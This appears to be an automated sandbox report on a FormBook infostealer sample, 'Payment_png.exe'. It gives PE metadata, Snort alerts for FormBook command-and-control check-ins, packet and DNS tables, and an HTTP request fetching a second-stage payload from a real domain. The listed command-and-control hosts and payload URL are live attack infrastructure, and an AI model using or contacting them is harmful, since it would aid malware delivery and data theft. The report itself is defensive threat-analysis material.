                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x180cc0x8a8data
                                                          RT_ICON0x17a040x6c8data
                                                          RT_ICON0x1749c0x568GLS_BINARY_LSB_FIRST
                                                          RT_GROUP_ICON0x1746c0x30data
                                                          RT_VERSION0x171500x31cdataEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaInStrB, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0409 0x04b0
                                                          LegalCopyrightCopyright Singapore
                                                          InternalNametempelhallerne
                                                          FileVersion3.01
                                                          CompanyNameSingapore Lin
                                                          LegalTrademarksCopyright Singapore
                                                          ProductNameFarmor2
                                                          ProductVersion3.01
                                                          FileDescriptionSingapore Lin
                                                          OriginalFilenametempelhallerne.exe

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          03/29/21-13:59:15.924201TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.334.102.136.180
                                                          03/29/21-13:59:15.924201TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.334.102.136.180
                                                          03/29/21-13:59:15.924201TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.334.102.136.180
                                                          03/29/21-13:59:16.123062TCP1201ATTACK-RESPONSES 403 Forbidden804973434.102.136.180192.168.2.3
                                                          03/29/21-13:59:32.253784TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.3172.67.184.37
                                                          03/29/21-13:59:32.253784TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.3172.67.184.37
                                                          03/29/21-13:59:32.253784TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.3172.67.184.37
                                                          03/29/21-13:59:37.759049TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.335.246.6.109
                                                          03/29/21-13:59:37.759049TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.335.246.6.109
                                                          03/29/21-13:59:37.759049TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.335.246.6.109
                                                          03/29/21-13:59:42.981524TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3217.160.0.233
                                                          03/29/21-13:59:42.981524TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3217.160.0.233
                                                          03/29/21-13:59:42.981524TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3217.160.0.233
                                                          03/29/21-13:59:53.620903TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.323.227.38.32
                                                          03/29/21-13:59:53.620903TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.323.227.38.32
                                                          03/29/21-13:59:53.620903TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.323.227.38.32
                                                          03/29/21-13:59:53.792627TCP1201ATTACK-RESPONSES 403 Forbidden804974223.227.38.32192.168.2.3
                                                          03/29/21-14:00:09.372027TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.3

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 29, 2021 13:58:28.539237976 CEST4971280192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:28.674309969 CEST8049712170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:28.674395084 CEST4971280192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:28.675035000 CEST4971280192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:28.809909105 CEST8049712170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:28.811625957 CEST8049712170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:28.811692953 CEST4971280192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:28.993220091 CEST4971380192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.129069090 CEST8049713170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.130745888 CEST4971380192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.131409883 CEST4971380192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.268816948 CEST8049713170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.270570040 CEST8049713170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.270664930 CEST4971380192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.277507067 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.412364006 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.414856911 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.435201883 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.570220947 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.570487022 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.570508957 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.570549965 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.570565939 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.570672989 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.570724964 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.570738077 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.576385975 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.576472044 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.681586027 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.821729898 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.822938919 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.838079929 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.985810041 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985831022 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985848904 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985866070 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985881090 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985894918 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985913038 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985928059 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985937119 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.985939980 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985959053 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:29.985985994 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.985992908 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.985999107 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.986002922 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:29.986120939 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121068954 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121112108 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121124029 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121136904 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121149063 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121160030 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121244907 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121305943 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121356010 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121362925 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121423960 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121444941 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121460915 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121490002 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121512890 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121520996 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121706963 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121766090 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121871948 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121890068 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121903896 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.121933937 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.121957064 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.122147083 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.122204065 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.122302055 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.122318029 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.122333050 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.122359037 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.122376919 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.122622967 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.122641087 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.122679949 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.122704029 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256247997 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256272078 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256283998 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256298065 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256309986 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256339073 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256453037 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256511927 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256527901 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256570101 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256577015 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256581068 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256609917 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256653070 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256666899 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256709099 CEST49714443192.168.2.3170.249.199.106
                                                          Mar 29, 2021 13:58:30.256777048 CEST44349714170.249.199.106192.168.2.3
                                                          Mar 29, 2021 13:58:30.256813049 CEST44349714170.249.199.106192.168.2.3

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 29, 2021 13:58:03.306735039 CEST5020053192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:03.352776051 CEST53502008.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:04.082914114 CEST5128153192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:04.132050037 CEST53512818.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:04.998243093 CEST4919953192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:05.047425985 CEST53491998.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:05.763973951 CEST5062053192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:05.809840918 CEST53506208.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:06.584971905 CEST6493853192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:06.633824110 CEST53649388.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:07.366197109 CEST6015253192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:07.413595915 CEST53601528.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:08.147408962 CEST5754453192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:08.209928036 CEST53575448.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:09.131398916 CEST5598453192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:09.180187941 CEST53559848.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:09.940485954 CEST6418553192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:09.986318111 CEST53641858.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:15.098123074 CEST6511053192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:15.145654917 CEST53651108.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:25.582076073 CEST5836153192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:25.628344059 CEST53583618.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:26.644798040 CEST6349253192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:26.690715075 CEST53634928.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:27.612477064 CEST6083153192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:27.671569109 CEST53608318.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:27.860575914 CEST6010053192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:27.906409979 CEST53601008.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:28.343625069 CEST5319553192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:28.516680956 CEST53531958.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:28.821455002 CEST5014153192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:28.991142035 CEST53501418.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:29.466384888 CEST5302353192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:29.519741058 CEST53530238.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:31.563354969 CEST4956353192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:31.609754086 CEST53495638.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:33.293075085 CEST5135253192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:33.341991901 CEST53513528.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:33.966454983 CEST5934953192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:34.022157907 CEST53593498.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:43.042294025 CEST5708453192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:43.088284016 CEST53570848.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:44.142561913 CEST5882353192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:44.193439960 CEST53588238.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:45.353490114 CEST5756853192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:45.399928093 CEST53575688.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:58:45.457151890 CEST5054053192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:58:45.514496088 CEST53505408.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:10.096434116 CEST5436653192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:10.145376921 CEST53543668.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:10.315231085 CEST5303453192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:10.361108065 CEST53530348.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:10.780493975 CEST5776253192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:10.826448917 CEST53577628.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:14.059994936 CEST5543553192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:14.115717888 CEST53554358.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:15.812453032 CEST5071353192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:15.880345106 CEST53507138.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:21.130537033 CEST5613253192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:21.452011108 CEST53561328.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:26.464684963 CEST5898753192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:26.610491037 CEST53589878.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:32.034113884 CEST5657953192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:32.202716112 CEST53565798.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:37.574982882 CEST6063353192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:37.686423063 CEST53606338.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:42.869838953 CEST6129253192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:42.936120987 CEST53612928.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:45.327696085 CEST6361953192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:45.373949051 CEST53636198.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:46.420058966 CEST6493853192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:46.491791964 CEST53649388.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:48.076154947 CEST6194653192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:48.231761932 CEST53619468.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:53.513850927 CEST6491053192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:53.579756021 CEST53649108.8.8.8192.168.2.3
                                                          Mar 29, 2021 13:59:58.811161041 CEST5212353192.168.2.38.8.8.8
                                                          Mar 29, 2021 13:59:58.890744925 CEST53521238.8.8.8192.168.2.3
                                                          Mar 29, 2021 14:00:03.900238037 CEST5613053192.168.2.38.8.8.8
                                                          Mar 29, 2021 14:00:04.060530901 CEST53561308.8.8.8192.168.2.3
                                                          Mar 29, 2021 14:00:09.069717884 CEST5633853192.168.2.38.8.8.8
                                                          Mar 29, 2021 14:00:09.134391069 CEST53563388.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Mar 29, 2021 13:58:28.343625069 CEST192.168.2.38.8.8.80xbb4dStandard query (0)aps-mm.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:58:28.821455002 CEST192.168.2.38.8.8.80xa416Standard query (0)www.aps-mm.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:15.812453032 CEST192.168.2.38.8.8.80x1584Standard query (0)www.plowbrothers.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:21.130537033 CEST192.168.2.38.8.8.80x43aStandard query (0)www.slutefuter.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.464684963 CEST192.168.2.38.8.8.80x77dcStandard query (0)www.loversdeal.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:32.034113884 CEST192.168.2.38.8.8.80xd2caStandard query (0)www.booksfall.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:37.574982882 CEST192.168.2.38.8.8.80x8448Standard query (0)www.pcpartout.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:42.869838953 CEST192.168.2.38.8.8.80xd02aStandard query (0)www.birkenhof-allgaeu.netA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:48.076154947 CEST192.168.2.38.8.8.80x1385Standard query (0)www.choupisson.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:53.513850927 CEST192.168.2.38.8.8.80x4e8aStandard query (0)www.uforservice.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:58.811161041 CEST192.168.2.38.8.8.80x2170Standard query (0)www.domennyarendi39.netA (IP address)IN (0x0001)
                                                          Mar 29, 2021 14:00:03.900238037 CEST192.168.2.38.8.8.80x184fStandard query (0)www.accinf5.comA (IP address)IN (0x0001)
                                                          Mar 29, 2021 14:00:09.069717884 CEST192.168.2.38.8.8.80xdb28Standard query (0)www.silverdollarcafe.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Mar 29, 2021 13:58:28.516680956 CEST8.8.8.8192.168.2.30xbb4dNo error (0)aps-mm.com170.249.199.106A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:58:28.991142035 CEST8.8.8.8192.168.2.30xa416No error (0)www.aps-mm.comaps-mm.comCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:58:28.991142035 CEST8.8.8.8192.168.2.30xa416No error (0)aps-mm.com170.249.199.106A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:10.145376921 CEST8.8.8.8192.168.2.30x552aNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:15.880345106 CEST8.8.8.8192.168.2.30x1584No error (0)www.plowbrothers.complowbrothers.comCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:15.880345106 CEST8.8.8.8192.168.2.30x1584No error (0)plowbrothers.com34.102.136.180A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:21.452011108 CEST8.8.8.8192.168.2.30x43aServer failure (2)www.slutefuter.comnonenoneA (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)www.loversdeal.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST8.8.8.8192.168.2.30x77dcNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:32.202716112 CEST8.8.8.8192.168.2.30xd2caNo error (0)www.booksfall.comwww.booksfall.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST8.8.8.8192.168.2.30x8448No error (0)www.pcpartout.comwww197.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST8.8.8.8192.168.2.30x8448No error (0)www197.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST8.8.8.8192.168.2.30x8448No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST8.8.8.8192.168.2.30x8448No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST8.8.8.8192.168.2.30x8448No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:42.936120987 CEST8.8.8.8192.168.2.30xd02aNo error (0)www.birkenhof-allgaeu.net217.160.0.233A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:48.231761932 CEST8.8.8.8192.168.2.30x1385No error (0)www.choupisson.com66.96.160.133A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:53.579756021 CEST8.8.8.8192.168.2.30x4e8aNo error (0)www.uforservice.comuforservice.comCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 13:59:53.579756021 CEST8.8.8.8192.168.2.30x4e8aNo error (0)uforservice.com23.227.38.32A (IP address)IN (0x0001)
                                                          Mar 29, 2021 13:59:58.890744925 CEST8.8.8.8192.168.2.30x2170Name error (3)www.domennyarendi39.netnonenoneA (IP address)IN (0x0001)
                                                          Mar 29, 2021 14:00:04.060530901 CEST8.8.8.8192.168.2.30x184fName error (3)www.accinf5.comnonenoneA (IP address)IN (0x0001)
                                                          Mar 29, 2021 14:00:09.134391069 CEST8.8.8.8192.168.2.30xdb28No error (0)www.silverdollarcafe.comsilverdollarcafe.comCNAME (Canonical name)IN (0x0001)
                                                          Mar 29, 2021 14:00:09.134391069 CEST8.8.8.8192.168.2.30xdb28No error (0)silverdollarcafe.com34.102.136.180A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • aps-mm.com
                                                          • www.aps-mm.com
                                                          • www.plowbrothers.com
                                                          • www.loversdeal.com
                                                          • www.pcpartout.com
                                                          • www.birkenhof-allgaeu.net
                                                          • www.choupisson.com
                                                          • www.uforservice.com
                                                          • www.silverdollarcafe.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349712170.249.199.10680C:\Users\user\Desktop\Payment_png.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:58:28.675035000 CEST290OUTGET /bin_BNUtTDfY243.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: aps-mm.com
                                                          Cache-Control: no-cache
                                                          Mar 29, 2021 13:58:28.811625957 CEST291INHTTP/1.1 301 Moved Permanently
                                                          Date: Mon, 29 Mar 2021 11:58:28 GMT
                                                          Server: Apache
                                                          Location: http://www.aps-mm.com/bin_BNUtTDfY243.bin
                                                          Content-Length: 249
                                                          Content-Type: text/html; charset=iso-8859-1
